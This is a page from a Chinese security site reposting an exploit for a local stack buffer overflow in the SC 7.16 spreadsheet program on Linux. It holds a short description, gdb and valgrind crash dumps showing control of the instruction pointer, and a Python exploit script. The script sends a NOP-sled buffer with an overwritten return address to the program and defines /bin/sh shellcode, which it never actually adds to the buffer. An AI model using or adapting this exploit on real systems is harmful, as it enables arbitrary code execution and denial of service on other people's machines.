首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 SC 7.16 - Stack-Based Buffer Overflow 来源：http://www.exploitpack.com 作者：Sacco 发布时间：2018-03-13   # Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com> # Bug found using Exploit Pack - Local fuzzer feature. # # Tested on: GNU/Linux - Kali Linux # Filename: pool/main/s/sc/sc_7.16-4+b2_i386.deb # # Description: SC v7.16 is prone to a basic stack-based buffer overflow # vulnerability because the application fails to perform adequate # boundary-checks on user-supplied input. # # An attacker could exploit this issue to execute arbitrary code in the # context of the application. Failed exploit attempts will result in a # denial-of-service condition. # # Vendor homepage: SC v7.16 - http://www.ibiblio.org/pub/Linux/apps/financial/spreadsheet/!INDEX.html # # #[----------------------------------registers-----------------------------------] #EAX: 0x0 #EBX: 0x41414141 ('AAAA') #ECX: 0x42 ('B') #EDX: 0x1 #ESI: 0x41414141 ('AAAA') #EDI: 0x41414141 ('AAAA') #EBP: 0x41414141 ('AAAA') #ESP: 0xbfffee30 --> 0xbffff100 --> 0xb7fd9000 (jg     0xb7fd9047) #EIP: 0x41424344 ('DCBA') #EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) #[-------------------------------------code-------------------------------------] #Invalid $PC address: 0x41424344 #[------------------------------------stack-------------------------------------] #0000| 0xbfffee30 --> 0xbffff100 --> 0xb7fd9000 (jg     0xb7fd9047) #0004| 0xbfffee34 --> 0x1 #0008| 0xbfffee38 --> 0x0 #0012| 0xbfffee3c --> 0x0 #0016| 0xbfffee40 --> 0xf63d4e2e #0020| 0xbfffee44 --> 0xb7fe4bf9 (<do_lookup_x+1689>: add    esp,0x20) #0024| 0xbfffee48 --> 0x1 #0028| 0xbfffee4c --> 0x1 #[------------------------------------------------------------------------------] #Legend: code, data, rodata, value #Stopped reason: SIGSEGV #0x41424344 in ?? () #gdb-peda$ backtrace ##0  0x41424344 in ?? () ##1  0xbffff100 in ?? () #Backtrace stopped: previous frame inner to this frame (corrupt stack?) #gdb-peda$ # #==2332== #==2332== Jump to the invalid address stated on the next line #==2332==    at 0x41424344: ??? #==2332==  Address 0x41424344 is not stack'd, malloc'd or (recently) free'd #==2332== #==2332== #==2332== Process terminating with default action of signal 11 (SIGSEGV) #==2332==  Access not within mapped region at address 0x41424344 #==2332==    at 0x41424344: ??? import subprocess import os   buffersize =  1052 nopsled = "\x90" # Shell shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" eip = "\x10\xf0\xff\xbf" buffer = nopsled * (buffersize-len(shellcode)) + eip   try:    subprocess.call(["/usr/bin/sc", buffer]) except OSError as e:    if e.errno == os.errno.ENOENT:        print "SC binary not found!"    else:     print "Error executing exploit"    raise   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Advantech WebAccess < 8.3 - Di ·ACL Analytics 13.0.0.579 Arbit ·DEWESoft X3 SP1 (64-bit) - Rem ·MikroTik RouterOS < 6.38.4 (x8 ·ManageEngine Applications Mana ·MikroTik RouterOS < 6.38.4 (MI ·Sony Playstation 4 (PS4) 4.55 ·Spring Data REST < 2.6.9 (Inga ·Memcached 1.5.5 - 'Memcrashed ·MikroTik RouterOS < 6.41.3/6.4 ·memcached Proof of Concept Amp ·Android DRM Services - Buffer   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved